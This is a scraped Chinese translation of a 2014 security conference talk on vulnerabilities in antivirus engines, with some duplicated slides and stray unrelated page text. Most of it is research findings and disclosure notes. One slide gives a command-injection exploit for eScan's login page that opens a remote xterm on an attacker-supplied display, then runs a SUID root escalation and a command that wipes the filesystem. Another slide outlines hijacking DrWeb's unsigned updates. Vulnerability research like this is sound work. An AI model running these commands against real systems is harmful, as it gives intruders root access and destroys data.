如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

Size: px

Start display at page:

Download "如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议"

谘弋彭
7 years ago
Views:

1 如何找到杀毒产品的漏洞 Joxean Koret, COSEINC SYSCAN 360, 2014

2 如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

3 杀毒引擎杀毒引擎的一般共同特点 : 用C/C++ 语言编写 ; 基于特征码引擎 + 启发式 ; 按访问扫描 ; 命令行 / GUI 的按需扫描 ; 支持压缩文件 ; 支持加壳 ; 支持其他多种文件格式杀毒引擎的高级共同特点 : 数据包过滤器和防火墙 ; 驱动防护 anti-rootkits 等... Anti-exploiting 工具包

4 杀毒产品或引擎杀毒引擎是杀毒产品的核心内核一些杀毒引擎被多种产品广泛使用例如,BitDefender 是使用最广泛的杀毒内核在诸如 G-Data escan F-Secure 等产品中都能见到它的身影多数大型杀毒公司都有自己的引擎, 但也不是全部都有有些公司, 例如 F -Secure, 会在他们的产品中集成第三方引擎广义上, 此次演讲汇总, 我讲着重讨论的是杀毒引擎内核, 而不是产品

5 攻击面事实 : 在你计算机上安装应用程序, 会更易受攻击的你只不过是增加了你的攻击面而已如果应用程序是本地程序 : 则本地攻击面增加如果应用程序是远程程序 : 则远程攻击面增加如果您的应用程序具有最高权限运行安装内核驱动与数据包过滤器, 并且尝试处理任何您的计算机可能做的事情你的攻击面将大大增加

6 神话与现实杀毒产品的宣传语 : 我们让你的电脑更安全, 没有性能损失! 我们可以抵御未知的 0day 攻击!. 现实中 : 杀毒引擎会使你的电脑的性能受到不同程度的损失, 并且表现的更易受攻击杀毒引擎也会受 0day 攻击, 就像它所保护的那些不被攻击的程序一样顺便说一句, 甚至还可以降低操作系统漏洞缓解

7 Breaking antivirus software 介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

8 攻击杀毒引擎通常, 由于性能的原因, 杀毒引擎都由非托管语言编写大多数引擎都是用 C 或者 C++ 编写的, 只有少数几个例外, 比如古老的 MalwareBytes 是用 VB6 编译的这将转换为缓冲区溢出, 整数溢出, 格式字符串等等多数杀毒引擎都会安装系统驱动这将转换为本地权限提升杀毒引擎必须支持的文件格式列表 : Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf, Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... 这将转换为上述文件格式解析器中的 bugs

9 攻击杀毒引擎杀毒引擎不仅要支持大量的文件格式, 还要比厂商支持得更快当针对某种文件格式的利用漏洞出现的时候, 消费者就会尽快的针对这些文件寻求支援这个过程持续的越长, 那么顾客转移到另外的厂商的几率就越高而生产者并不需要对格式不正确的文件提供帮助需要这么做的, 恰恰是杀毒引擎厂商需要处理格式不正确的文件, 但是又拒绝如此, 是因为修复这类文件又将带来新的漏洞例如 : Adobe Acrobat

10 攻击杀毒引擎即使不是所有, 但大多数的杀毒引擎都需要具有最高权限运行 :Root 或 LocalSystem 一旦有人能够发现并利用杀毒引擎中的漏洞, 那么他 / 她一定可以获得 Root 或 LocalSystem 权限大多数杀毒引擎都只通过 HTTP 协议进行升级 : 一旦有人可以对此 HTTP 协议连接进行中间人攻击 (MITM), 比如在局域网内, 那么他 / 她就可以安装或者替换新的文件了它往往转换成获取安装此杀毒软件的电脑的全部控制权, 因为更新过程往往不会签名校验是的, 他们不会的稍后我将展示众多充满漏洞易受攻击的产品中的一个

11 如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

12 杀毒软件中的漏洞大约七月底八月初开始, 在一些杀毒引擎中发现漏洞, 起初是为了好玩而已只是在业余时间, 时不时的花几个小时研究在 14 款杀毒引擎活杀毒产品中发现了远程与本地的漏洞大多数都是在最初的两个月时间内发现的共测试了大概至多 17 款引擎 ( 抱歉, 记不太确切了 ) 这说明了一切接下来我来谈一谈这些我所发现的漏洞后续的也只是其中的一小部分

13 杀毒软件中的漏洞 Avast: Heap overflow in RPM ( 已报告, 已修复, 并且获得了 Bug 赏金 ) AVG: Heap overflow with CPIO ( 已修复...)/Multiple vulnerabilities with packers Avira: Multiple remote vulnerabilities BitDefender: Multiple remote vulnerabilities ClamAV:Infinite loop with a malformed PE ( 已报告, 已修复 ) Comodo: Heap overflow with CHM DrWeb: Multiple remote vulnerabilities ( 升级引擎中的漏洞已修复 ) ESET: Integer overflow with PDF ( 已修复 )/Multiple vulnerabilities with packers F-Prot: Heap overflows with multiple packers F-Secure: Multiple vulnerabilities in Aqua engine (all the F-Secure own bugs fixed) Panda: Multiple local privilege escalations ( 已报告并部分修复 ) escan: Multiple remote command injection ( 说都修复了吗? 吼吼, 深表怀疑...) 还有很多很多...

14 如何发现这些漏洞? 最初, 我使用了我自己制作的 fuzzing 测试套件通过当时我能找到的一个 Linux 系统, 我下载了所有的杀毒引擎引擎的核心都是大体相同的, 只有几个启发式引擎是例外还要使用一些技巧来在 Linux 系统中运行 Windows 系统的杀毒程序通过简单地使用 radamsa + ClamAV 的测试套件,fuzzed 每个杀毒引擎的命令行工具, 许多不同的 EXE 包装和一些随机的文件格式结果 : 得到数以十计的远程利用漏洞同时, 我也进行了基本的本地和远程检查 : 地址空间格局的随机化 (ASLR), 空 ACLs, 更新协议, 网络协议等等...

15 Fuzzing 数据一个朋友曾经说服我来写一个 Fuzzer( 漏洞检查工具 ), 来在一场私人会议中做一次 Fuzzing explained 的对话非常简单的 fuzzing 引擎, 最大可以使用 10 个节点 I'm poor... I cannot start relatively small, with 300 boxes like Google people does. 使用这个 fuzzing 套件来 fuzz 各个基于 Linux 的我可以运行和调试的反病毒引擎那次对话中, 我针对以下的引擎, 做了 fuzz /test BitDefender, Comodo, F-Prot, F-Secure, Avast, ClamAV, AVG. 结果...

16 初步实验结果 ClamAV: 1 处基于 PE 文件中畸形图标资源的远程拒绝服务漏洞 Avast: 1 处可能的基于在处理 RedHat 软件包管理工具中未初始化的变量的远程代码执行漏洞 F-Secure: CPIO 中 1 处内存枯竭 bug Comodo: 2 处堆溢出漏洞, 1 个基于 CHM 文件处理 F-Prot: Armadillo, PECompact, ASPack and Yoda's Protector unpackers heap overflows. AVG: CPIO 及 XAR 堆溢出 BitDefender: 惊人的 bug 数. 许多都可以被利用

17 如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

18 杀毒引擎的漏洞利用利用杀毒引擎中的漏洞, 就像利用其它客户端应用程序类似但与利用浏览器或者 PDF 阅读器的漏洞略有不同更多是像利用 Office 文件格式的漏洞现在, 由于 ASLR 的存在, 远程利用客户端程序中内存中断漏洞也将变得十分困难然而, 杀毒引擎会经常出现大量的错误, 所以, 不要担心 :)...

19 杀毒引擎的漏洞利用接下来将要简要陈述的是 : 远程利用而以下内容讲不会被涉及 : 本地用户系统或内核系统本地利用漏洞遗憾的是我对内核系统的了解并不够多接下来, 我将讨论一些本地漏洞并且给出如何利用他们的详细信息但这些不是内核的东西, 并且也太容易被利用

20 杀毒引擎的漏洞利用一般而言, AV 引擎都启用 ASLR 进行编译但是, 只有核心模块是使用 ASLR 编译的现象, 更是常见比如, 没有图形用户界面相关的程序和库一些杀毒引擎的核心部分库并不启用 ASLR 请检查您的目标产品, 和自己的产品, 这并不是特例 :)

21 杀毒引擎的漏洞利用即使在主流的杀毒引擎中... 也存在未启用 ASLR 的模块 ;... 在已修复地址中都存在着 RWX 页面 ;... 都禁用了 DEP 当然, 在某些情况下这种条件, 往往都是模拟器

22 杀毒引擎的漏洞利用即使在主流的杀毒引擎中... 也存在未启用 ASLR 的模块 ;... 在已修复地址中都存在着 RWX 页面 ;... 都禁用了 DEP 当然, 在某些情况下这种条件, 往往都是模拟器

23 杀毒引擎的漏洞利用 x86 模拟器是杀毒引擎的重要组成部分它用来在内存中对样本进行解包, 来判断可执行程序的行为大多数杀毒引擎都会在固定地址创建 RWX 页, 同时在使用模拟器的时候会禁用 DEP... 非常普遍并不只适用于一些随机的杀毒引擎

24 杀毒引擎的漏洞利用 ( 更多提示 ) 默认情况下, 杀毒引擎将尝试解压压缩文件并扫描里面的文件压缩文件 (zip, tgz, rar, ace 等格式 ) 可以包含多种文件下面是一种常见的杀毒引擎漏洞利用情形 : 发送压缩的 zip 文件 ; 起始的第一个文件强制加载并使用模拟器 ; 第二个文件才开始真正的漏洞利用

25 杀毒引擎的漏洞利用杀毒引擎包含多个模拟器在主流杀毒引擎中, 模拟器包括了针对 x86, AMD64, ARM, JavaScript, VBScript 等情况据我所知, 这些模拟器不能被用来执行 heap spraying 但他们暴露了大量的攻击面在模拟器里很容易就可以发现内存泄露, 特别是在 JavaScript 引擎它们可以被用来构建复杂的攻击, 因为我们有一个编程接口来制作输入到杀毒引擎

26 杀毒引擎的漏洞利用 : 总结与利用开发其他客户端应用程序相比, 利用杀毒引擎的漏洞并没有特别的不同他们没有 / 也不会提供任何特殊的自我保护意识他们依靠操作系统的功能 (ASLR / DEP ), 别无其他有时他们甚至会禁用这些功能对于漏洞编写者来说, 还存在着大量的编程接口 : 模拟器 : x86, AMD-64, ARM, JavaScript,.... 多个进行不同操作的文件将会被发送到一个压缩文件中在我所测试的杀毒软件引擎中, 攻破杀毒软件引擎就意味着获得 Root 或 System 权限, 通常也不需要从沙箱中逃逸

27 如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

28 更多详情 : 关于杀毒引擎和杀毒产品的漏洞... Extracted from Copyright Matthew Inman

29 Disclaimer 我只是展示了我发现的漏洞中的一小部分我有坏习惯, 每天都要吃三顿饭曾经处于各种各样的原因, 我联系过五个安全厂商 : Avast. 他们提供了 Bug 赏金好样儿的! ClamAV. 他们的杀毒软件是开源产品 Panda. 我有一些密友在那儿 Ikarus, ESET and F-Secure. 他们很友好的联系了我并寻求帮助我是不会负责任地联系那些不负责任的市值数百万美元的公司的我的研究并不是是免费的请审核您的产品...

30 本地特权提升

32 案例 :Panda 引擎本地提权在 Global Protection 2013 这款产品中, 有许多进程是作为系统运行的其中两个进程, 有空进程 ACL: WebProxy.EXE 和 SrvLoad.EXE 我们可以使用 CreateRemoteThread 来注入一个 DLL 文件可以获得两个非常简单的本地特权提升但该过程是由护盾提供保护的

33 案例 :Panda 引擎本地提权另一种可怕的 bug:panda 的安装目录必须为所有用户写入权限然而, 又重复说一句, 这个目录由护盾提供保护的... 那个护盾 (shield) 是什么?...

34 案例 :Panda 引擎本地提权 Panda shield 是保护一些 Panda 进程, 以及 Program Files 目录的驱动程序它会读取一些注册表键值来决定护盾是否开启但是... 注册表键是谁都可以去更改的. 所以, 这很好笑, 同时这里还会有一个 pavshld.dll 文件与各种导出函数......

35 案例 :Panda 引擎本地提权所有的导出函数包含人类可读的名字但不包括最初的两个函数 :PAVSHLD_001 以及 002. 出于显而易见的原因, 我决定对他们做逆向工程... 第一个函数是用来关闭护盾的后门它只接收一个说法, 一个密钥 (GUID): ae a a8f-2606b94d9f13 如果秘钥正确, 那么相应的注册表键将会写入那么, 是不是你自己写的注册表项更容易...

36 MOAR PANDAZ 在这款杀毒引擎中, 还有更多愚蠢的 bug 例如, 没有使用 ASLR 技术编译的库任何人都可以很轻松的写出一个针对 Panda 的漏洞攻击, 不需要花费太多精力同时, 任何人都可以写出一个针对 Panda Global Protection 用户的漏洞攻击为什么会这样? 因为在所有进程中,Panda 产品注入了 3 个库, 但并没有开启 ASLR 是的

37 Panda 我向厂商报告了这些情况, 因为在 Panda 那边有我的朋友. 这些漏洞, 按照推理, 已经被修复了一些, 然后还有一些仍没有修复, 比如... 护盾的后门 Panda 安装目录的权限

38 ASLR : 地址空间布局随机化 (Address Space Layout Randomization)

39 关闭 ASLR 我们已经讨论过了关于 Panda Global Protection 在所有模块中都没有开启 ASLR 的情况你是否相信这仅仅是一款杀毒产品的个别问题? 因为这在杀毒产品 / 杀毒引擎中很常见, 这样的问题并不明显...

40 举个例子...

41 Forticlient 进程 av_task.exe 是实际上的杀毒软件扫描器...

42 Forticlient 大多数库和二进制文件 Forticlient 都没有启用 ASLR 一旦这些未能开启 ASLR 的模块中出现 bug, 那么利用漏洞攻击 Forticlient 实在是微不足道你可能认为, 对于这么大的产品来说, 这是不会发生的问题再想想...

43 2 random AVs nobody uses...

44 Kaspersky 在 SyScan 2014 新加坡会议开始之前, 库文件 avzkrnl.dll 和 vlns.kdl 模块漏洞扫描器 (LOL), 都没有开启 ASLR 我们都可以很轻松的写一个可靠的攻击卡巴斯基杀毒软件

45 Kaspersky 在 SyScan 2014 新加坡大会之后, 即使我已经向公众公开 ASLR 绕过情况, 他们仍然没有修复这些漏洞鄙人已经无语了啊... 但似乎他们根本不在乎, 像同行业中大多数杀毒软件公司一样如果扫描进程在运行中具有系统最高权限, 又没有任何沙盒运行, 那何苦解决这个问题呢?

46 BitDefender 针对 BitDefender 进行漏洞利用攻击更加容易 Security service my ass...

48 BKAV BKAV 是一款越南产的杀毒软件产品 Gartner 公司评价这家公司是新兴市场中的酷哥而我认为这款产品是便于有针对性攻击的酷杀软...

49 BKAV BKAV 的服务项都没有开启 ASLR...

50 BKAV 和 Panda 一样,BKAV 的防火墙引擎也会在系统中注入未开启 ASLR 的库真是愧对于保护您的计算机顺便说一句, 这处漏洞在几个月前的 SyScan 2014 新加坡大会上已经被公开披露

51 杀毒软件开发人员编写安全软件

52 远程拒绝服务 Remote Denial of Service

54 举例 : ClamAV DOS 在 ClamAV 的扫描图标资源目录中有一处 bug 如果数值太大, ClamAV 会开始几乎永恒的循环状态通过向引擎添加更多的限制来修复这是通过该死的 fuzzing 发现的已经向厂商报告此漏洞. 因为这是开源的产品... 请访问 : 这处漏洞 ClamAV 小组处理的很好很友善 ( 现在是 Cisco 了 ).

56 解压炸弹 ( 多杀软 ) 还记得他们吗? 如果我记得没错的话, 大概是在 2001 年的 BugTraq 上, 第一轮讨论中 ( 我们有讨论过他们 ) 一个压缩文件, 包含了许多压缩文件的, 又或者是包含了许多大文件它可以被认为是远程拒绝服务你是否认为杀毒引擎再未来的 10 年或者更长时间里, 不容易受到任何更多此类的 bug 影响? 在这种情况下, 你错了... 看看下表就知道了...

57 无效的杀软们 ZIP GZ BZ2 RAR 7Z ESET X (***) X (***) BitDefender Sophos X (*) X X X Comodo AVG Ikarus Kaspersky X (**) X X X X * Sophos 是在 30 秒之后完成的测试环境是 16 核 CPU 及 32 GB 内存的机器 ** Kaspersky 生成了一个临时文件. 一个 32GB 的 dumb file 使用 7z 压缩之后是 3MB *** 在我最近的一次测试中,ESET 每个文件都是在一分钟之后完成的, 虽然使用的是我的小型测试机.

59 BitDefender 引擎 BitDefender 是一款罗马尼亚制作的杀毒引擎. 他们的杀软核心是现今在其他杀软产品分布最广的杀毒引擎举一些例子 : F-Secure, G-Data, escan, LavaSoft, Immunet,... 像几乎所有其他杀毒引擎 / 杀毒产品一样, 它也有许多的漏洞在这个引擎发现漏洞是很简单的事举一些简单的例子...

60 BitDefender bugs ( 此次漏洞已修复 ) 修改使用 Shrinker3 打包机打包的 PE 文件中的 2 处 DWORD 从而引起崩溃 : 这些字节被用于计算文件和内存中解压后的 PE 文件新的章节排列当设置为 0xFFFFFFFF 和 0xFFFFFFF 时, 这两个文件和段对齐方式都会被设置为 0...

61 BitDefender bugs... 而稍后他们的值将在在一些算术运算中使用这两处 bug 都很容易被发现但是他们自己却没有发现这些问题

62 One more complex BitDefender bug... ( 此次漏洞已修复 ) 在 Thinstall 安装器中修改一个字节, 将导致产品崩溃 : 修改了一个字节之后, 解压缩后的内容会崩溃表格的索引将会和崩溃的内容一起计算... 同时已经被攻击者掌控的数据会被复制到同样容易控制的地方再说一遍 : 这种 bug 很容易被发现, 简直是微不足道

63 BitDefender 备注这一处 bug 和所有的 BitDefender 的 bug 都不会影响到专门的 BitDefender 产品它会影响如前所述的许多杀毒产品在你的产品中添加一个新的杀毒引擎, 可能听起来会很酷, 但这么做也会引入第三方的 bug 到自己的产品中而且, 顺便说一句, 你并没有在添加到您的产品之前进行检验... 否则, 我怀疑你为什么会添加它

65 ESET Nod32 ESET Nod32 是一个广为人知的, 来自斯洛伐克的杀毒引擎像许多其他的杀毒引擎一样, 它也有好多好多显而易见可以被发现的漏洞举一个简单的例子 : 一个错误格式的 PDF 文件一个有数组的 /W(idth) 数组元素使用一个负值或者很大的值会导致其崩溃一个简单的远程拒绝服务

66 ESET Nod32 bug with PDF files 据 ESET 来源消息说, 他们使用 fuzzing 测试作为质量保证的一部分我认为他们做的还不够好... 发现这个 bug 是微不足道的, 像所有那些我前面所展示的这个 bug 已经报告给 ESET 并且已经修复

67 远程执行代码 Remote Code Execution

69 DrWeb antivirus DrWeb 是一款来自俄罗斯的杀毒软件举几个简单的例子, 俄罗斯最大的银行 :Sberbank, 最大的搜索引擎 :Yandex 以及国家杜马, 都是他们的客户更多的宣传资料 : ( 这个信息的原网页已经失效了, 当时我是在 SyScan 2014 新加坡会议时披露了一处漏洞 )

70 DrWeb 的升级协议 DrWeb 使用 HTTP 协议进行更新,( 不知道现在是不是还是这样 ), 而不是使用 SSL/TLS 它首先下载一个目录文件 : 以 Linux 为例 : 在该目录文件中, 包含了一系列可更新文件, 和它们的 HASH 值 : VDB files (Virus DataBases). DrWeb32.dll. 简单的说, 即使是 DrWeb32.dll 库文件,HASH 值只是 CRC32, 并且没有签名

71 DrWeb 的升级协议政府最高级别证书用于病毒库文件和杀毒库的最高等级的检查 : CRC32. O( _ )O 哈!. 这些域名已经足够用来在局域网进行拦截 : update.nsk1.drweb.com update.drweb.com update.msk.drweb.com update.us.drweb.com update.msk5.drweb.com update.msk6.drweb.com update.fr1.drweb.com update.us1.drweb.com update.nsk1.drweb.com... 然后替换 drweb32.dll 文件为您修改过的版本 (lzma'ed)

72 DrWeb 的升级协议使用 ettercap 和便捷的 Python web server 搭配 Unix lzma 工具, 来对 DrWeb 进行漏洞攻击是很容易的事你只需要计算 CRC32 的校验然后压缩 ( LZMA ) drweb32.dll 文件就可以了在 Linux 系统验证这个 bug: 全部执行代码是可行的很显然, 你需要在一个局域网内才能做到这样一个俄罗斯人写了 Windows 系统 Metasploit 漏洞研究在我看来, 这个升级协议太可怕了不知道现在有没有进行修改

73 DrWeb 升级协议漏洞这个漏洞已经修复, 并且也发出了警报在警报中他们没有说明已经修复了这个漏洞这个预警只有俄语的版本, 没有英文版, 恐怕也没有中文版他们只描述说进行了修改, 以提高更新程序的安全性从技术上讲 : 是从没有安全升级到有一些安全性我没有研究这个更新升级但我有 99% 的把握肯定他们这样做是错误的不过我已经没有时间来在这次论坛上检查这些了, 抱歉咯 :(

75 escan for Linux 在新加坡的几个无聊的夜里, 我偶然发现 escan 的产品有 Linux 的版本于是我就下载并且安装了 ( 拜酒店糟糕的网络所赐, 这就居然折腾了一个小时 ) 然后我检查看看它都安装了些什么, 寻找一些 SUID 二进制文件, 等等... 他们使用了 BitDefender 和 ClamAV 引擎, 而自己并没有属于自己的引擎, 所以就没有必要测试扫描器了因为我已经发现过了这些引擎中的漏洞了他们安装了一个 Web 服务器来进行管理, 和 SUID 二进制文件, 叫做 : /opt/microworld/sbin/runasroot

76 escan for Linux SUID 二进制文件允许以下用户执行根命令 : root mwconf ( 安装过程中创建 ). escan 的管理程序 ( 命名为 :MwAdmin) 有着明显的缺陷, 所以我在第一个常驻命令扩展中就进行中止... 这个问题最近已经修复了登录表单的命令注入 (PHP). 在一个安全产品是的

77 escan for Linux login page

78 escan for Linux remote root 这个特定的 bug 需要知道, 或者猜测现在存在的用户并不困难 Immunity 的人们发现了更多的 bug, 就是并不需要猜测用户名, 并且使用这个程序作为狩猎漏洞的教学工具这个程序烂透了作为教程, 它只适合教学, 不要做什么或怎么做容易进行攻击通过 PHP 的函数 exec 来执行, 用户名和密码被用来构操作系统命令... 我没能注入用户名但是我能注入用户密码

79 Source code of login.php (I)

80 Source code of login.php (II) 发送给用户的密码要通过 check_user 传递 : 对于密码, 只有一些非常基本的检查 : 专为 shell 转义字符但是他们忘记了其他字符, 比如 ';'.

81 Source code of common_functions.php 然后, 给定的密码将在 check_user 函数中使用, 类似这样 :

82 escan for Linux RCE 我发现的超级霹雳无敌酷炫漏洞利用 : $ xhost + $ export TARGET= $ curl --data "product=1&uname=valid@user.com&pass= ;DISPLAY=YOURIP:0;xterm;" $TARGET/ login.php 然后你就可以运行这个来提权 : $ /opt/microworld/sbin/runasroot /usr/bin/ xterm 或者, 为所欲为... $ /opt/microworld/sbin/runasroot rm -vfr /*

83 如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

84 结论广义上, 杀毒软件是这样的面对熟练的攻击者, 不会让你获得更安全的体验... 反而会增加你的受攻击面... 面对熟练的攻击者, 更容易受到攻击... 和任何其他应用程序一样, 有弱点易受攻击而一些杀毒软件则是可能会降低您的操作系统保护程度... 被本地和远程漏洞所困扰一些杀毒软件公司在他们的产品里狗屁安全防护都不提供

85 如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

86 对杀毒软件的用户的建议不要盲目信任你使用的杀软产品顺便说, 不要信任你使用的杀软产品同时, 不要信任你使用的杀软产品不, 我强调的还不够隔离那些安装了杀毒软件的电脑, 不要将他们用于网关, 网络检测等项目上... 及时审核您的杀软引擎, 或者邀请第三方来检验审核您打算部署的杀软引擎

87 对杀毒软件公司的建议审核你们的产品 : 源代码复核 & fuzzing. 不, AV-Comparatives 和类似的测评又不会远程关闭这些开展 Bug 赏金奖励也是个好办法, 就像 Avast 做的那样不要使用最高权限来扫描网络数据包文件等等... 你并不需要成为 root/system 权限来扫描一个网络数据包或文件你只需要 root/system 权限以获得该数据包或文件的内容发送的网络数据包或文件内容到另一个, 低特权或沙盒内的进程

88 对杀毒软件公司的建议在模拟器虚拟机, 至少也是在沙盒中, 运行危险代码据我所知只有一家公司是这么做的用 C / C + + 代码编写的文件解析器是很危险的如果你发现了一个漏洞, 然后在模拟器或者沙盒中运行, 你还需要拥有一个逃逸漏洞来掌控杀毒引擎为什么针对浏览器的漏洞攻击比安全产品的要困难? 或者使用一种安全的语言事实上一些杀毒产品就是这样做的, 举个例子 : 使用 Lua 不要相信你自己的进程他们也会被别人掌控我不是在谈论文件签名我说的是你的杀软的正在运行的进程

89 对杀毒软件公司的建议不要使用普通的 HTTP 协议来更新您的产品请使用 SSL/TLS. 同时, 对所有文件进行数字签名不,CRC 不是一个签名真的... 然后确认在签名后边没有别的内容了此外, 再验证整个证书链...

90 对杀毒软件公司的建议放弃那些今天已经用不到的旧代码, 或使这些代码默认不可用针对 MS- DOS 时代的病毒, 加壳, 保护器等的代码.. 对现在完全不受支持的产品的文件格式漏洞的解析器这种在多年没有碰过的旧代码很可能也会有漏洞忽略那些杀毒软件测评公司的关于要求你们检测那些来自侏罗纪时代的恶意软件请远离他们

91 欢迎大家提问

思科身份服务引擎支持的 Mac OS X AV/AS 产品合规性模块版本

思科身份服务引擎支持的 Mac OS X AV/AS 产品合规性模块版本 3.610482.2 本文档提供有关 Cisco NAC 代理版本 4.9.2.701 至 4.9.5.x 对 Mac OS X AV/AS 的支持信息有关其他支持信息以及完整的版本更新信息, 请参阅与您的思科身份服务引擎发行版本相对应的思科身份服务引擎版本说明支持的 Mac OS X AV/AS 产品概要新增 AV 产品

如何找到杀毒产品的漏洞 介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议

如何找到杀毒产品的漏洞介绍攻击杀毒引擎发掘漏洞杀毒引擎的漏洞利用杀毒产品的漏洞结论建议